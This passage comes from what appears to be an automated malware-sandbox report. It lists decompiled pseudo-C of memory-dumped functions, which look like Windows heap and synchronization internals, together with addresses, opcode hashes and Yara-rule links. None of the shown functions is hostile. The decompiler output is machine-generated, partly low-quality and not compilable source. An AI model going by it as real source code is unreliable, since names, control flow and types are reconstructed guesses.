												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04F2AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4fdb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4fd84c0;
																			if(_t82 >=  *0x4fd84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04FB9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04EE922A(_t99);
										_t64 = E04F07D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04FB8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4fd86c0; // 0x30007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4fd86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4fd86bc;
													_t87 = 0x4fd86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04EE9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4fd86c4;
												_t87 = 0x4fd86c0;
												L27:
												E04F19B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04F3D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4fd5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4fd538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                                0x04ee9082
                                                                                                                                0x04ee9083
                                                                                                                                0x04ee9084
                                                                                                                                0x04ee9085
                                                                                                                                0x04ee9087
                                                                                                                                0x04ee9096
                                                                                                                                0x04ee9098
                                                                                                                                0x04ee9098
                                                                                                                                0x04ee909e
                                                                                                                                0x04ee90a8
                                                                                                                                0x04ee90e7
                                                                                                                                0x04ee90e7
                                                                                                                                0x04ee90aa
                                                                                                                                0x04ee90b0
                                                                                                                                0x04ee90b7
                                                                                                                                0x04ee90bd
                                                                                                                                0x04ee90dd
                                                                                                                                0x04ee90e6
                                                                                                                                0x04ee90bf
                                                                                                                                0x04ee90bf
                                                                                                                                0x04ee90c7
                                                                                                                                0x04ee90cf
                                                                                                                                0x04ee90f1
                                                                                                                                0x04ee90f2
                                                                                                                                0x04ee90f4
                                                                                                                                0x04ee90f5
                                                                                                                                0x04ee90f6
                                                                                                                                0x04ee90f7
                                                                                                                                0x04ee90f8
                                                                                                                                0x04ee90f9
                                                                                                                                0x04ee90fa
                                                                                                                                0x04ee90fb
                                                                                                                                0x04ee90fc
                                                                                                                                0x04ee90fd
                                                                                                                                0x04ee90fe
                                                                                                                                0x04ee90ff
                                                                                                                                0x04ee9100
                                                                                                                                0x04ee9102
                                                                                                                                0x04ee9107
                                                                                                                                0x04ee910c
                                                                                                                                0x04ee9110
                                                                                                                                0x04ee9113
                                                                                                                                0x04ee9115
                                                                                                                                0x04ee9136
                                                                                                                                0x04ee913f
                                                                                                                                0x04ee9143
                                                                                                                                0x04f437e4
                                                                                                                                0x04f437e4
                                                                                                                                0x04ee9117
                                                                                                                                0x04ee9117
                                                                                                                                0x04ee911d
                                                                                                                                0x00000000
                                                                                                                                0x04ee911f
                                                                                                                                0x04ee911f
                                                                                                                                0x04ee9125
                                                                                                                                0x00000000
                                                                                                                                0x04ee9127
                                                                                                                                0x04ee912d
                                                                                                                                0x04ee9130
                                                                                                                                0x04ee9134
                                                                                                                                0x04ee9158
                                                                                                                                0x04ee915d
                                                                                                                                0x04ee9161
                                                                                                                                0x04ee9168
                                                                                                                                0x04f43715
                                                                                                                                0x04ee916e
                                                                                                                                0x04ee916e
                                                                                                                                0x04ee9175
                                                                                                                                0x04ee9177
                                                                                                                                0x04ee917e
                                                                                                                                0x04ee917f
                                                                                                                                0x04ee9182
                                                                                                                                0x04ee9182
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee918a
                                                                                                                                0x04ee918d
                                                                                                                                0x04ee918f
                                                                                                                                0x04ee9192
                                                                                                                                0x04ee9195
                                                                                                                                0x04ee9198
                                                                                                                                0x04ee9198
                                                                                                                                0x04ee9198
                                                                                                                                0x04ee919a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4371f
                                                                                                                                0x04f43721
                                                                                                                                0x04f43727
                                                                                                                                0x04f4372f
                                                                                                                                0x04f43733
                                                                                                                                0x04f43735
                                                                                                                                0x04f43738
                                                                                                                                0x04f4373b
                                                                                                                                0x04f4373d
                                                                                                                                0x04f43740
                                                                                                                                0x00000000
                                                                                                                                0x04f43746
                                                                                                                                0x04f43746
                                                                                                                                0x04f43749
                                                                                                                                0x00000000
                                                                                                                                0x04f4374f
                                                                                                                                0x04f4374f
                                                                                                                                0x04f43751
                                                                                                                                0x04f43757
                                                                                                                                0x04f43759
                                                                                                                                0x04f4375c
                                                                                                                                0x04f4375c
                                                                                                                                0x04f4375e
                                                                                                                                0x04f4375e
                                                                                                                                0x04f43761
                                                                                                                                0x04f43764
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43766
                                                                                                                                0x04f43768
                                                                                                                                0x04f437a3
                                                                                                                                0x04f437a3
                                                                                                                                0x04f437a5
                                                                                                                                0x04f437a7
                                                                                                                                0x04f437ad
                                                                                                                                0x04f437b0
                                                                                                                                0x04f437b2
                                                                                                                                0x04f437bc
                                                                                                                                0x04f437c2
                                                                                                                                0x04f437c2
                                                                                                                                0x04f437b2
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee918a
                                                                                                                                0x04ee918d
                                                                                                                                0x04ee918f
                                                                                                                                0x04ee9192
                                                                                                                                0x04ee9195
                                                                                                                                0x00000000
                                                                                                                                0x04ee9195
                                                                                                                                0x00000000
                                                                                                                                0x04f4376a
                                                                                                                                0x04f4376a
                                                                                                                                0x04f4376a
                                                                                                                                0x04f4376c
                                                                                                                                0x04f4376c
                                                                                                                                0x04f4376f
                                                                                                                                0x04f43775
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43777
                                                                                                                                0x04f43779
                                                                                                                                0x04f43782
                                                                                                                                0x04f43787
                                                                                                                                0x04f43789
                                                                                                                                0x04f43790
                                                                                                                                0x04f43790
                                                                                                                                0x04f4378b
                                                                                                                                0x04f4378b
                                                                                                                                0x04f4378b
                                                                                                                                0x04f43792
                                                                                                                                0x04f43795
                                                                                                                                0x00000000
                                                                                                                                0x04f43795
                                                                                                                                0x00000000
                                                                                                                                0x04f43779
                                                                                                                                0x04f43798
                                                                                                                                0x00000000
                                                                                                                                0x04f43798
                                                                                                                                0x00000000
                                                                                                                                0x04f43768
                                                                                                                                0x04f4379b
                                                                                                                                0x04f4379b
                                                                                                                                0x04f43751
                                                                                                                                0x04f43749
                                                                                                                                0x00000000
                                                                                                                                0x04f43740
                                                                                                                                0x04ee91a0
                                                                                                                                0x04ee91a3
                                                                                                                                0x04ee91a9
                                                                                                                                0x04ee91b0
                                                                                                                                0x00000000
                                                                                                                                0x04ee91b0
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee91b4
                                                                                                                                0x04ee91b4
                                                                                                                                0x04ee91bb
                                                                                                                                0x04ee91c0
                                                                                                                                0x04ee91c5
                                                                                                                                0x04ee91c7
                                                                                                                                0x04f437da
                                                                                                                                0x04ee91cd
                                                                                                                                0x04ee91cd
                                                                                                                                0x04ee91cd
                                                                                                                                0x04ee91d2
                                                                                                                                0x04ee91d5
                                                                                                                                0x04ee9239
                                                                                                                                0x04ee9239
                                                                                                                                0x04ee91d7
                                                                                                                                0x04ee91db
                                                                                                                                0x04ee91e1
                                                                                                                                0x04ee91e7
                                                                                                                                0x04ee91fd
                                                                                                                                0x04ee9203
                                                                                                                                0x04ee921e
                                                                                                                                0x04ee9223
                                                                                                                                0x00000000
                                                                                                                                0x04ee9205
                                                                                                                                0x04ee9205
                                                                                                                                0x04ee9208
                                                                                                                                0x04ee920c
                                                                                                                                0x04ee9214
                                                                                                                                0x04ee9214
                                                                                                                                0x04ee920c
                                                                                                                                0x04ee91e9
                                                                                                                                0x04ee91e9
                                                                                                                                0x04ee91ee
                                                                                                                                0x04ee91f3
                                                                                                                                0x04ee91f3
                                                                                                                                0x04ee91f3
                                                                                                                                0x04ee91e7
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ee9134
                                                                                                                                0x04ee9125
                                                                                                                                0x04ee911d
                                                                                                                                0x04ee914e
                                                                                                                                0x04ee90d1
                                                                                                                                0x04ee90d1
                                                                                                                                0x04ee90d3
                                                                                                                                0x04ee90d6
                                                                                                                                0x04ee90d8
                                                                                                                                0x00000000
                                                                                                                                0x04ee90d8
                                                                                                                                0x04ee90cf

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 98ce241734b9533e2e6718d5d91aa93cafb4a9310d3b12cc5c15c573d50f68d8
                                                                                                                                • Instruction ID: affd2fa0d78e4d73ccda7a00aa500594f87ec44e19ff1d2603167c77893881f0
                                                                                                                                • Opcode Fuzzy Hash: 98ce241734b9533e2e6718d5d91aa93cafb4a9310d3b12cc5c15c573d50f68d8
                                                                                                                                • Instruction Fuzzy Hash: 330128B26012049FE3159F19DC40B217BFAEF81328F656066E1019F792C375FC41CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F7C450, Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 46%
                                                                                                                                			E04F7C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04F29910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04F295B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04F295D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04F295D0();
				return L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                                                0x04f7c458
                                                                                                                                0x04f7c45d
                                                                                                                                0x04f7c466
                                                                                                                                0x04f7c468
                                                                                                                                0x04f7c469
                                                                                                                                0x04f7c46a
                                                                                                                                0x04f7c46b
                                                                                                                                0x04f7c46e
                                                                                                                                0x04f7c46f
                                                                                                                                0x04f7c471
                                                                                                                                0x04f7c476
                                                                                                                                0x04f7c476
                                                                                                                                0x04f7c47c
                                                                                                                                0x04f7c47e
                                                                                                                                0x04f7c480
                                                                                                                                0x04f7c480
                                                                                                                                0x04f7c483
                                                                                                                                0x04f7c484
                                                                                                                                0x04f7c486
                                                                                                                                0x04f7c488
                                                                                                                                0x04f7c48f
                                                                                                                                0x04f7c491
                                                                                                                                0x04f7c493
                                                                                                                                0x04f7c493
                                                                                                                                0x04f7c48f
                                                                                                                                0x04f7c498
                                                                                                                                0x04f7c49e
                                                                                                                                0x04f7c4ad
                                                                                                                                0x04f7c4ad
                                                                                                                                0x04f7c4b2
                                                                                                                                0x04f7c4b4
                                                                                                                                0x04f7c4cd

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                • Instruction ID: 83d441bdae9e3a4726f2cd2af18229d34a67fba538f1f2871e368ab5ea2fdc38
                                                                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                • Instruction Fuzzy Hash: 410192B2280555BFE721AF65CD80E63FBADFF54394F004525F114435A0CB65BCA2CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB4015, Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 86%
                                                                                                                                			E04FB4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04F02280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04F02280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4fd86ac);
					E04EEF900(0x4fd86d4, _t28);
					E04EFFFB0(0x4fd86ac, _t28, 0x4fd86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04EFFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                                                0x04fb401a
                                                                                                                                0x04fb401e
                                                                                                                                0x04fb4023
                                                                                                                                0x04fb4028
                                                                                                                                0x04fb4029
                                                                                                                                0x04fb402b
                                                                                                                                0x04fb402f
                                                                                                                                0x04fb4043
                                                                                                                                0x04fb4046
                                                                                                                                0x04fb4051
                                                                                                                                0x04fb4057
                                                                                                                                0x04fb405f
                                                                                                                                0x04fb4062
                                                                                                                                0x04fb4067
                                                                                                                                0x04fb406f
                                                                                                                                0x04fb407c
                                                                                                                                0x04fb407c
                                                                                                                                0x04fb408c
                                                                                                                                0x04fb408c
                                                                                                                                0x04fb4097

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f183757f8e82734f2c6dea008bfd3f2143b8b4f2dcd2040798cf5f5354628ffe
                                                                                                                                • Instruction ID: 1c895cd1ab41546f7ef41586c20fd97bbeccf3da19fd313b1087b2b8a687d527
                                                                                                                                • Opcode Fuzzy Hash: f183757f8e82734f2c6dea008bfd3f2143b8b4f2dcd2040798cf5f5354628ffe
                                                                                                                                • Instruction Fuzzy Hash: D90184726419457FE211BB69CD84E53B7ACEB856A8B000665B60883A52CB24FC12C6E4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FA14FB, Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 61%
                                                                                                                                			E04FA14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4fdd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04F2FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04F07D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                0x04fa14fb
                                                                                                                                0x04fa14fb
                                                                                                                                0x04fa150a
                                                                                                                                0x04fa1514
                                                                                                                                0x04fa1519
                                                                                                                                0x04fa151b
                                                                                                                                0x04fa1526
                                                                                                                                0x04fa152c
                                                                                                                                0x04fa1534
                                                                                                                                0x04fa1537
                                                                                                                                0x04fa153a
                                                                                                                                0x04fa1545
                                                                                                                                0x04fa1557
                                                                                                                                0x04fa1547
                                                                                                                                0x04fa1550
                                                                                                                                0x04fa1550
                                                                                                                                0x04fa1562
                                                                                                                                0x04fa1563
                                                                                                                                0x04fa1565
                                                                                                                                0x04fa156a
                                                                                                                                0x04fa157f

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 602c3f2cffec86ec012d83d203791b358a7cc96d4dead9531188bcbaa1947635
                                                                                                                                • Instruction ID: e217883b2a731a3c13fa48fb6bdddcec72d42b3ee9545c59a0770543a7f50f7e
                                                                                                                                • Opcode Fuzzy Hash: 602c3f2cffec86ec012d83d203791b358a7cc96d4dead9531188bcbaa1947635
                                                                                                                                • Instruction Fuzzy Hash: 01019271A01258AFDB10EF68D942EAEBBB8EF45710F004066F904EB280D674EA01CB95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FA138A, Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 61%
                                                                                                                                			E04FA138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4fdd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04F2FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04F07D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                0x04fa138a
                                                                                                                                0x04fa138a
                                                                                                                                0x04fa1399
                                                                                                                                0x04fa13a3
                                                                                                                                0x04fa13a8
                                                                                                                                0x04fa13aa
                                                                                                                                0x04fa13b5
                                                                                                                                0x04fa13bb
                                                                                                                                0x04fa13c3
                                                                                                                                0x04fa13c6
                                                                                                                                0x04fa13c9
                                                                                                                                0x04fa13d4
                                                                                                                                0x04fa13e6
                                                                                                                                0x04fa13d6
                                                                                                                                0x04fa13df
                                                                                                                                0x04fa13df
                                                                                                                                0x04fa13f1
                                                                                                                                0x04fa13f2
                                                                                                                                0x04fa13f4
                                                                                                                                0x04fa13f9
                                                                                                                                0x04fa140e

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c580e19c376a4afe45a5c91ae90eb54549c6d2b7c9c856d4a77d62b61327daaa
                                                                                                                                • Instruction ID: 2cb4bbba471e99b0dd5a5042774992f90f065eecb704f961850cee12b3e31aba
                                                                                                                                • Opcode Fuzzy Hash: c580e19c376a4afe45a5c91ae90eb54549c6d2b7c9c856d4a77d62b61327daaa
                                                                                                                                • Instruction Fuzzy Hash: 85015271E01318AFDB14EFA9D942EAEBBB8EF44710F004066B904EB280D674AA11CB95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE58EC, Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 91%
                                                                                                                                			E04EE58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4fdd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4ec5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04EE5943() != 0 &&  *0x4fd5320 > 5) {
					E04F67B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04F67B5E( &_v28, _t28);
					_t11 = E04F67B9C(0x4fd5320, 0x4ecbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04F2B640(_t11, _t17, _v8 ^ _t29, 0x4ecbf15, _t27, _t28);
			}















                                                                                                                                0x04ee58fb
                                                                                                                                0x04ee58fe
                                                                                                                                0x04ee5906
                                                                                                                                0x04ee590a
                                                                                                                                0x04ee593c
                                                                                                                                0x04ee593c
                                                                                                                                0x04ee590c
                                                                                                                                0x04ee590c
                                                                                                                                0x04ee5911
                                                                                                                                0x00000000
                                                                                                                                0x04ee5913
                                                                                                                                0x04ee5913
                                                                                                                                0x04ee5913
                                                                                                                                0x04ee5911
                                                                                                                                0x04ee591d
                                                                                                                                0x04f41035
                                                                                                                                0x04f4103c
                                                                                                                                0x04f4103f
                                                                                                                                0x04f41056
                                                                                                                                0x04f41056
                                                                                                                                0x04ee593b

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 51bc98b9eb8eddc6da0962e3c1916c5871e7cb66f745d3564719c83b0c8d5e04
                                                                                                                                • Instruction ID: 39abd091fd839b9ea4bd8cc427f4925daa5cd75fff63a360df05bbff94ef254a
                                                                                                                                • Opcode Fuzzy Hash: 51bc98b9eb8eddc6da0962e3c1916c5871e7cb66f745d3564719c83b0c8d5e04
                                                                                                                                • Instruction Fuzzy Hash: 34018431A00118ABE714EF6ADD019FE77ADEB4022CF951069AA15A7244DE21FD028750
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB1074, Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04FB1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04FB165E(__ebx, 0x4fd8ae4, (__edx -  *0x4fd8b04 >> 0x14) + (__edx -  *0x4fd8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4fd8b04 >> 0x14) + (__edx -  *0x4fd8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04FAAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04F07D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04F9FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                                                0x04fb1074
                                                                                                                                0x04fb1080
                                                                                                                                0x04fb1082
                                                                                                                                0x04fb108a
                                                                                                                                0x04fb108f
                                                                                                                                0x04fb1093
                                                                                                                                0x04fb10ab
                                                                                                                                0x04fb10ab
                                                                                                                                0x04fb10c3
                                                                                                                                0x04fb10cf
                                                                                                                                0x04fb10e1
                                                                                                                                0x04fb10d1
                                                                                                                                0x04fb10da
                                                                                                                                0x04fb10da
                                                                                                                                0x04fb10e9
                                                                                                                                0x04fb10f5
                                                                                                                                0x04fb10f5
                                                                                                                                0x04fb10fe

                                                                                                                                Memory Dump Source
